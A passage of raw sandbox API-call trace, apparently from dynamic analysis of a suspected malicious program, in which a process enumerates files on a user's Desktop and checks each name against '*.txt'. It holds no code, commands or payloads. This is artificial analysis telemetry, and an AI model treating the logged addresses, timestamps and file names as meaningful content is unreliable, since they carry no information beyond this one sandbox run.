lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SSkrbDuTIF.m4a", cchWideChar=46, lpMultiByteStr=0x29a0550, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SSkrbDuTIF.m4a", lpUsedDefaultChar=0x0) returned 46 [0110.657] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x39700d0 [0110.657] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0550 | out: hHeap=0x29a0000) returned 1 [0110.657] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04e8 | out: hHeap=0x29a0000) returned 1 [0110.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.657] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aabd0 [0110.657] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aabd0, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.657] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aabd0 | out: hHeap=0x29a0000) returned 1 [0110.657] PathMatchSpecW (pszFile="SSkrbDuTIF.m4a", pszSpec="*.txt") returned 0 [0110.657] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.657] FindNextFileW (in: hFindFile=0x743860, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x285d0430, ftCreationTime.dwHighDateTime=0x1d7aa27, ftLastAccessTime.dwLowDateTime=0xcfb35a10, ftLastAccessTime.dwHighDateTime=0x1d7ad22, ftLastWriteTime.dwLowDateTime=0xcfb35a10, ftLastWriteTime.dwHighDateTime=0x1d7ad22, nFileSizeHigh=0x0, nFileSizeLow=0xc05d, dwReserved0=0x0, dwReserved1=0x0, cFileName="StgqeHlfrw0.m4a", cAlternateFileName="STGQEH~1.M4A")) returned 1 [0110.657] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.658] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.658] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="StgqeHlfrw0.m4a" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\StgqeHlfrw0.m4a") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\StgqeHlfrw0.m4a" [0110.658] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.658] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.658] lstrcatW (in: lpString1="\\", lpString2="StgqeHlfrw0.m4a" | out: lpString1="\\StgqeHlfrw0.m4a") returned="\\StgqeHlfrw0.m4a" [0110.658] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04e8 [0110.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\StgqeHlfrw0.m4a", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0110.658] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2f) returned 0x29a0550 [0110.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\StgqeHlfrw0.m4a", cchWideChar=47, lpMultiByteStr=0x29a0550, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\StgqeHlfrw0.m4a", lpUsedDefaultChar=0x0) returned 47 [0110.658] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x39700d0 [0110.658] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0550 | out: hHeap=0x29a0000) returned 1 [0110.658] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04e8 | out: hHeap=0x29a0000) returned 1 [0110.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.658] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aabe8 [0110.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aabe8, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.658] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aabe8 | out: hHeap=0x29a0000) returned 1 [0110.658] PathMatchSpecW (pszFile="StgqeHlfrw0.m4a", pszSpec="*.txt") returned 0 [0110.658] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.658] FindNextFileW (in: hFindFile=0x743860, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5cc60f70, ftCreationTime.dwHighDateTime=0x1d7a02f, ftLastAccessTime.dwLowDateTime=0xa9de71c0, ftLastAccessTime.dwHighDateTime=0x1d7a585, ftLastWriteTime.dwLowDateTime=0xa9de71c0, ftLastWriteTime.dwHighDateTime=0x1d7a585, nFileSizeHigh=0x0, nFileSizeLow=0x1280, dwReserved0=0x0, dwReserved1=0x0, cFileName="SWeD.odt", cAlternateFileName="")) returned 1 [0110.658] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.658] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.658] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="SWeD.odt" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SWeD.odt") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SWeD.odt" [0110.658] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.659] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.659] lstrcatW (in: lpString1="\\", lpString2="SWeD.odt" | out: lpString1="\\SWeD.odt") returned="\\SWeD.odt" [0110.659] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x39700d0 [0110.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SWeD.odt", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0110.659] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x28) returned 0x29a3138 [0110.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SWeD.odt", cchWideChar=40, lpMultiByteStr=0x29a3138, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\SWeD.odt", lpUsedDefaultChar=0x0) returned 40 [0110.659] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a04e8 [0110.659] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a3138 | out: hHeap=0x29a0000) returned 1 [0110.659] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.659] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.659] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aaaf8 [0110.659] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aaaf8, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.659] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aaaf8 | out: hHeap=0x29a0000) returned 1 [0110.659] PathMatchSpecW (pszFile="SWeD.odt", pszSpec="*.txt") returned 0 [0110.659] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04e8 | out: hHeap=0x29a0000) returned 1 [0110.659] FindNextFileW (in: hFindFile=0x743860, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a932a00, ftCreationTime.dwHighDateTime=0x1d7a7f6, ftLastAccessTime.dwLowDateTime=0x6167a550, ftLastAccessTime.dwHighDateTime=0x1d7ae78, ftLastWriteTime.dwLowDateTime=0x6167a550, ftLastWriteTime.dwHighDateTime=0x1d7ae78, nFileSizeHigh=0x0, nFileSizeLow=0x9172, dwReserved0=0x0, dwReserved1=0x0, cFileName="UQk58h 9TQk7yvi7D.mkv", cAlternateFileName="UQK58H~1.MKV")) returned 1 [0110.659] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.659] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.659] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="UQk58h 9TQk7yvi7D.mkv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\UQk58h 9TQk7yvi7D.mkv") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\UQk58h 9TQk7yvi7D.mkv" [0110.659] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.659] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.659] lstrcatW (in: lpString1="\\", lpString2="UQk58h 9TQk7yvi7D.mkv" | out: lpString1="\\UQk58h 9TQk7yvi7D.mkv") returned="\\UQk58h 9TQk7yvi7D.mkv" [0110.659] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04e8 [0110.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\UQk58h 9TQk7yvi7D.mkv", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0110.660] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x35) returned 0x29a0560 [0110.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\UQk58h 9TQk7yvi7D.mkv", cchWideChar=53, lpMultiByteStr=0x29a0560, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\UQk58h 9TQk7yvi7D.mkv", lpUsedDefaultChar=0x0) returned 53 [0110.660] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2c48 [0110.660] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0560 | out: hHeap=0x29a0000) returned 1 [0110.660] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04e8 | out: hHeap=0x29a0000) returned 1 [0110.660] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.660] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aac48 [0110.660] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aac48, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.660] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aac48 | out: hHeap=0x29a0000) returned 1 [0110.660] PathMatchSpecW (pszFile="UQk58h 9TQk7yvi7D.mkv", pszSpec="*.txt") returned 0 [0110.660] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2c48 | out: hHeap=0x29a0000) returned 1 [0110.660] FindNextFileW (in: hFindFile=0x743860, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd8827190, ftCreationTime.dwHighDateTime=0x1d7aa97, ftLastAccessTime.dwLowDateTime=0x8be18a00, ftLastAccessTime.dwHighDateTime=0x1d7ac64, ftLastWriteTime.dwLowDateTime=0x8be18a00, ftLastWriteTime.dwHighDateTime=0x1d7ac64, nFileSizeHigh=0x0, nFileSizeLow=0xefc6, dwReserved0=0x0, dwReserved1=0x0, cFileName="VAHC8zDa9SevTeoKicIh.docx", cAlternateFileName="VAHC8Z~1.DOC")) returned 1 [0110.660] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.660] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.660] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="VAHC8zDa9SevTeoKicIh.docx" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VAHC8zDa9SevTeoKicIh.docx") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VAHC8zDa9SevTeoKicIh.docx" [0110.660] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.660] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.660] lstrcatW (in: lpString1="\\", lpString2="VAHC8zDa9SevTeoKicIh.docx" | out: lpString1="\\VAHC8zDa9SevTeoKicIh.docx") returned="\\VAHC8zDa9SevTeoKicIh.docx" [0110.660] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04e8 [0110.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VAHC8zDa9SevTeoKicIh.docx", cchWideChar=57, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0110.660] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x39) returned 0x29a2bb8 [0110.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VAHC8zDa9SevTeoKicIh.docx", cchWideChar=57, lpMultiByteStr=0x29a2bb8, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VAHC8zDa9SevTeoKicIh.docx", lpUsedDefaultChar=0x0) returned 57 [0110.660] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2b70 [0110.660] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2bb8 | out: hHeap=0x29a0000) returned 1 [0110.660] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04e8 | out: hHeap=0x29a0000) returned 1 [0110.660] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.660] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aab58 [0110.661] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aab58, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.661] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aab58 | out: hHeap=0x29a0000) returned 1 [0110.661] PathMatchSpecW (pszFile="VAHC8zDa9SevTeoKicIh.docx", pszSpec="*.txt") returned 0 [0110.661] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2b70 | out: hHeap=0x29a0000) returned 1 [0110.661] FindNextFileW (in: hFindFile=0x743860, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfeb7dc60, ftCreationTime.dwHighDateTime=0x1d7aa10, ftLastAccessTime.dwLowDateTime=0xa18851b0, ftLastAccessTime.dwHighDateTime=0x1d7ac6c, ftLastWriteTime.dwLowDateTime=0xa18851b0, ftLastWriteTime.dwHighDateTime=0x1d7ac6c, nFileSizeHigh=0x0, nFileSizeLow=0x10367, dwReserved0=0x0, dwReserved1=0x0, cFileName="VbI-8gh.mkv", cAlternateFileName="")) returned 1 [0110.661] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.661] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.661] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="VbI-8gh.mkv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VbI-8gh.mkv") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VbI-8gh.mkv" [0110.661] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.661] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.661] lstrcatW (in: lpString1="\\", lpString2="VbI-8gh.mkv" | out: lpString1="\\VbI-8gh.mkv") returned="\\VbI-8gh.mkv" [0110.661] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04e8 [0110.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VbI-8gh.mkv", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0110.661] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2b) returned 0x29a0550 [0110.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VbI-8gh.mkv", cchWideChar=43, lpMultiByteStr=0x29a0550, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\VbI-8gh.mkv", lpUsedDefaultChar=0x0) returned 43 [0110.661] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x39700d0 [0110.661] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0550 | out: hHeap=0x29a0000) returned 1 [0110.661] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04e8 | out: hHeap=0x29a0000) returned 1 [0110.661] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.661] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aab70 [0110.661] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aab70, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.661] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aab70 | out: hHeap=0x29a0000) returned 1 [0110.661] PathMatchSpecW (pszFile="VbI-8gh.mkv", pszSpec="*.txt") returned 0 [0110.661] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.661] FindNextFileW (in: hFindFile=0x743860, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51556710, ftCreationTime.dwHighDateTime=0x1d7a815, ftLastAccessTime.dwLowDateTime=0xb84e1ac0, ftLastAccessTime.dwHighDateTime=0x1d7a9ff, ftLastWriteTime.dwLowDateTime=0xb84e1ac0, ftLastWriteTime.dwHighDateTime=0x1d7a9ff, nFileSizeHigh=0x0, nFileSizeLow=0x888f, dwReserved0=0x0, dwReserved1=0x0, cFileName="wwAL7t.mp4", cAlternateFileName="")) returned 1 [0110.661] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.661] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.661] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="wwAL7t.mp4" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\wwAL7t.mp4") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\wwAL7t.mp4" [0110.661] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.662] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.662] lstrcatW (in: lpString1="\\", lpString2="wwAL7t.mp4" | out: lpString1="\\wwAL7t.mp4") returned="\\wwAL7t.mp4" [0110.662] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04e8 [0110.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\wwAL7t.mp4", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0110.662] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2a) returned 0x29a0550 [0110.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\wwAL7t.mp4", cchWideChar=42, lpMultiByteStr=0x29a0550, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\wwAL7t.mp4", lpUsedDefaultChar=0x0) returned 42 [0110.662] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x39700d0 [0110.662] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0550 | out: hHeap=0x29a0000) returned 1 [0110.662] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04e8 | out: hHeap=0x29a0000) returned 1 [0110.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.662] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aaab0 [0110.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x29aaab0, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.662] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aaab0 | out: hHeap=0x29a0000) returned 1 [0110.662] PathMatchSpecW (pszFile="wwAL7t.mp4", pszSpec="*.txt") returned 0 [0110.662] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.662] FindNextFileW (in: hFindFile=0x743860, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa619a40, ftCreationTime.dwHighDateTime=0x1d7a2e8, ftLastAccessTime.dwLowDateTime=0x562811b0, ftLastAccessTime.dwHighDateTime=0x1d7af50, ftLastWriteTime.dwLowDateTime=0x562811b0, ftLastWriteTime.dwHighDateTime=0x1d7af50, nFileSizeHigh=0x0, nFileSizeLow=0x1057b, dwReserved0=0x0, dwReserved1=0x0, cFileName="XDMAiqRYF.jpg", cAlternateFileName="XDMAIQ~1.JPG")) returned 1 [0110.664] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.664] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.664] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="XDMAiqRYF.jpg" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\XDMAiqRYF.jpg") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\XDMAiqRYF.jpg" [0110.664] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.664] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.664] lstrcatW (in: lpString1="\\", lpString2="XDMAiqRYF.jpg" | out: lpString1="\\XDMAiqRYF.jpg") returned="\\XDMAiqRYF.jpg" [0110.664] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04e8 [0110.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\XDMAiqRYF.jpg", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0110.664] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2d) returned 0x29a0550 [0110.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 